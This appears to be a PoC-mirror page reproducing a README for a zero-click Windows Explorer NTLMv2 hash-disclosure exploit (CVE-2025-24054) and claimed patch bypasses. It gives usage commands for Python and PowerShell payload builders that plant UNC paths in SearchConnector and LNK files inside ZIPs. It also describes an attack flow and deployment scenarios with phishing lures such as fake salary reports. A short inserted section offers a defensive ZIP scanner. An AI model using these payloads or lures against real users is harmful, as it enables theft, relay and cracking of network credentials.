Related vulnerability
Title: Microsoft NTLM security vulnerability (CVE-2025-24054). Description: Microsoft NTLM is an authentication protocol from Microsoft Corporation (US) used on networks that include systems running the Windows operating system as well as standalone systems. Microsoft NTLM contains a security vulnerability. An attacker can exploit it to carry out spoofing attacks. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows Server 2019, Windows Server 2019 (
Description
Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
Introduction
# Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
### 🎥 Demonstration POC + March 2025 Patch bypass
[Watch the demonstration video on YouTube](https://www.youtube.com/watch?v=_NJ3jqU-wdk)
<div>
### 🎥 patch bypass
[Watch the patch bypass video on YouTube](https://www.youtube.com/watch?v=Btib3LBvpq8)
</div>
> *Click the links above to watch the vulnerability demonstration*
<h2>📋 Technical Overview</h2>
This repository provides a comprehensive research framework analyzing the vulnerability chain in Windows Shell file format processing that leads to NTLMv2-SSP credential disclosure. The toolkit implements two distinct attack vectors that exploit automatic UNC path resolution during file preview operations in Windows Explorer.
### Core Vulnerability Mechanism
The fundamental security issue resides in Windows Shell's automatic processing of embedded UNC paths within specific file formats during preview operations. When users open ZIP archives containing specially crafted files, Windows Explorer automatically resolves UNC paths without user consent, initiating SMB authentication attempts and exposing NTLMv2-SSP hashes to attacker-controlled servers.
### Attack Surface Components
- **File Format Parsing**: Windows Shell automatic processing of XML-based shell files and LNK shortcut properties
- **ZIP Container Bypass**: Archive preview functionality that circumvents Mark-of-the-Web (MOTW) protections
- **Authentication Trigger**: Automatic UNC resolution during metadata extraction and icon fetching operations
## 🏗️ Architecture Evolution
### 🔰 Phase 1: SearchConnector-based Disclosure (CVE-2025-24054)
**File:** `ntml-disclosure-poc.py`
This initial implementation exploits Windows Search Connector (.searchConnector-ms) files, which are XML-based configuration files that define search locations for Windows Explorer. The vulnerability triggers when Windows automatically processes the embedded UNC path in the `simpleLocation` element during ZIP archive preview operations.
**Technical Characteristics:**
- XML-based payload structure following Microsoft schema specifications
- UNC path embedding in `searchConnectorDescription` elements
- Automatic processing by Windows Search Indexer and Explorer shell
- Bypasses traditional file execution restrictions
### 🔰 Phase 2: LNK-in-ZIP Bypass (CVE-2025-50154 / CVE-2025-59214)
**File:** `patch_bypass.ps1`
This follow-up technique circumvents Microsoft's initial patch by leveraging LNK file properties. The attack exploits Windows Explorer's behaviour of fetching icon metadata and resolving target paths during ZIP file preview, while preserving the zero-click exploitation vector through careful property configuration.
**Technical Characteristics:**
- LNK files with UNC paths in `TargetPath` property
- Local icon references to bypass initial detection mechanisms
- Windows Shell automatic property extraction during preview
- Maintains file format legitimacy while achieving UNC resolution
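As a defensive counterpart to the two carrier formats described in Phase 1 and Phase 2, the following triage script is an added example written for this page; it is not part of the repository or either PoC. It inspects a ZIP archive for `.searchConnector-ms` and `.lnk` members that embed a UNC path (`\\host\share`), which is the artefact a mail gateway or incident responder would want to flag before Windows Explorer previews the archive. It searches both the raw bytes and a UTF-16LE view because shortcut string data is commonly UTF-16LE. The sample archive it builds is constructed for the test only: the `simpleLocation` content and the fake LNK bytes are stand-ins, not schema-accurate files.

```python
"""Heuristic ZIP triage for members that Explorer may resolve as UNC paths.

Added defensive example, not repository code. It does not parse the real
SearchConnector or LNK schemas; it flags any embedded \\host\share string
inside the two carrier formats named in the README.
"""
from __future__ import annotations

import io
import re
import zipfile
from dataclasses import dataclass

# Member suffixes the README names as preview-time triggers (case-insensitive).
SUSPECT_SUFFIXES = (".searchconnector-ms", ".lnk")

# \\host\share...: two backslashes, a hostname or IP, one backslash, a share name.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\[^\\\s"<>|]*')


@dataclass(frozen=True)
class Finding:
    member: str    # path inside the archive
    unc_path: str  # UNC string as found
    host: str      # remote host the client would try to authenticate to
    encoding: str  # "ascii" or "utf-16-le" view in which it was found


def find_unc_paths(data: bytes) -> list[tuple[str, str, str]]:
    """Return (unc_path, host, encoding) for every UNC path embedded in data."""
    views = (
        ("ascii", data.decode("latin-1")),              # 1 byte -> 1 char, never fails
        ("utf-16-le", data.decode("utf-16-le", "ignore")),  # LNK strings are UTF-16LE
    )
    hits = []
    for name, text in views:
        for m in UNC_RE.finditer(text):
            hits.append((m.group(0), m.group(1).lower(), name))
    return hits


def scan_zip_bytes(zip_bytes: bytes) -> list[Finding]:
    """Scan every suspect member of an in-memory ZIP and collect findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(SUSPECT_SUFFIXES):
                continue
            # Cap the read so a crafted archive cannot exhaust memory during triage.
            data = zf.open(info).read(1_000_000)
            for unc, host, enc in find_unc_paths(data):
                findings.append(Finding(info.filename, unc, host, enc))
    return findings


def build_sample_zip() -> bytes:
    """Constructed test archive (not a real payload): two suspect members, one benign."""
    connector_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<searchConnectorDescription>\n'
        '  <simpleLocation>\\\\10.0.0.5\\docs</simpleLocation>\n'  # constructed, not schema-accurate
        '</searchConnectorDescription>\n'
    ).encode("utf-8")
    # Stand-in for a shortcut: a 4-byte header followed by a UTF-16LE path string.
    fake_lnk = b"L\x00\x00\x00" + "\\\\fileserver.corp.example\\share\\report.docx".encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Project/report.searchConnector-ms", connector_xml)
        zf.writestr("Project/invoice.lnk", fake_lnk)
        zf.writestr("Project/readme.txt", "Path hint: \\\\10.0.0.5\\docs\n")  # not a trigger format
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip_bytes(build_sample_zip()):
        print(f"[!] {f.member}: {f.unc_path} -> host {f.host} ({f.encoding})")
```

To use it on a real attachment, pass the archive's bytes to `scan_zip_bytes`; any finding whose host is not an approved internal file server is a strong signal to quarantine the archive and to look for outbound SMB (TCP 445) attempts from the recipient's workstation.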
### 🔧 Prerequisites
<details>
<summary>For Python PoC:</summary>
* Python `3.6+`
* Required packages: `colorama`
</details>
<details>
<summary>For PowerShell PoC:</summary>
* Windows PowerShell `5.1+`
* Execution Policy: `Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser`
</details>
<hr>
### 🔰 Phase 1: Python Implementation (CVE-2025-24054)
```bash
# Basic usage
python ntml-disclosure-poc.py 192.168.1.100
# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
```

Example output:

```
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
```

**Parameters**
- `target` (required): Target IP address or hostname
- `-o`, `--output`: Custom output filename for the ZIP package
### 🔰 Phase 2: PowerShell Bypass (CVE-2025-50154/59214)
```powershell
# Basic usage - LNK file auto-removed
.\patch_bypass.ps1 -IP 192.168.1.100
# Keep LNK file for external distribution
.\patch_bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Custom lure name and share
.\patch_bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure "FileName" -KeepLnk
# Specify output directory
.\patch_bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
```

**Parameters**
- `-IP` (required): Target SMB server IP address
- `-Share`: SMB share name (default: `share`)
- `-File`: Target filename (default: `payload.exe`)
- `-Lure`: Social engineering filename (default: `Your_File_For_Payload_Here`)
- `-OutDir`: Output directory (default: current directory)
- `-KeepLnk`: Preserve the LNK file after ZIP creation
| Vector | Trigger Mechanism | User Interaction | Patch Status |
|---|---|---|---|
| **🔗 SearchConnector** | XML parsing + UNC resolution | ZIP open | 🛡️ Patched |
| **📎 LNK TargetPath** | Icon metadata fetch | ZIP open | 🔴 Active |
```mermaid
graph TD
A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Microsoft Patch]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Current State<br/>Active Exploitation]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc
```
### 🔧 Technical Specifications
1. 📦 Payload Generation
- Create malicious file (SearchConnector/LNK) with UNC path
- Package in ZIP archive with enticing name
2. 📤 Delivery
- Distribute ZIP via email/web/download
3. 💥 Exploitation
- Victim opens ZIP in Windows Explorer
- Automatic file preview triggers UNC resolution
- NTLMv2-SSP hash transmitted to attacker
4. 🎭 Post-Exploitation
- Hash capture and relay attacks
- Password cracking attempts
<hr>
### 💀 Deployment Scenarios
<b>📨 Scenario 1: Direct ZIP Distribution</b>
```powershell
# Create ZIP payload
.\patch_bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
```
<b>🔄 Scenario 2: LNK File Transfer</b>
```powershell
# Create and preserve LNK file for multi-host deployment
.\patch_bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Cross-host deployment:
Copy-Item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
```
<b>🎯 Scenario 3: Targeted Social Engineering</b>
```powershell
.\patch_bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
```
<h2 align="center">Contact the Developer</h2>

- Group & Contact: t.me/initial_persistence
- Email: tylerblackout17@gmail.com
File snapshot
[4.0K] /data/pocs/f7dadd080be0ef8e5fbb5423d9e21112174d6157
├── [ 12K] ntml-disclosure-poc.py
├── [4.3K] patch_bypass.ps1
└── [7.0K] README.md
1 directory, 3 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source has become unavailable or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.